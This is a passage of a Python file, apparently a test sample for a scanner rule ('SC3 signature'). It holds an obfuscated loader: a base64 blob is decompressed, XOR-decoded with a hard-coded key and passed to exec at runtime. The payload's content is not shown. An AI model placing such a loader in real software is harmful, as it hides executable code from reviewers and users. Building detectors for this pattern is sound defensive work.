9P11YskG+oPlN1h+qCapGyh0u9B+3FhDJzZtvd7/8jXE2OefcVFgqEScfTiq/FXDYS/yncos4Ski7cnZw0duhy7eeJ4u+QWyYx6pnR27LqHP69NwJHhIlLVYwJ/PWVWFIDkjyrPz5+AAEEqeY="
_K = bytes.fromhex("d1db7e50e958cd3e82c03bb6")

def _xor(buf, k):
    return bytes(b ^ k[i % len(k)] for i, b in enumerate(buf))

def _decode():
    inner = zlib.decompress(base64.b64decode(_OUTER))
    return _xor(base64.b64decode(inner), _K).decode("utf-8")

if __name__ == "__main__":
    # SC3 signature: base64.b64decode(...) -> exec / compile near by
    exec(compile(_decode(), "<runtime>", "exec"), {})
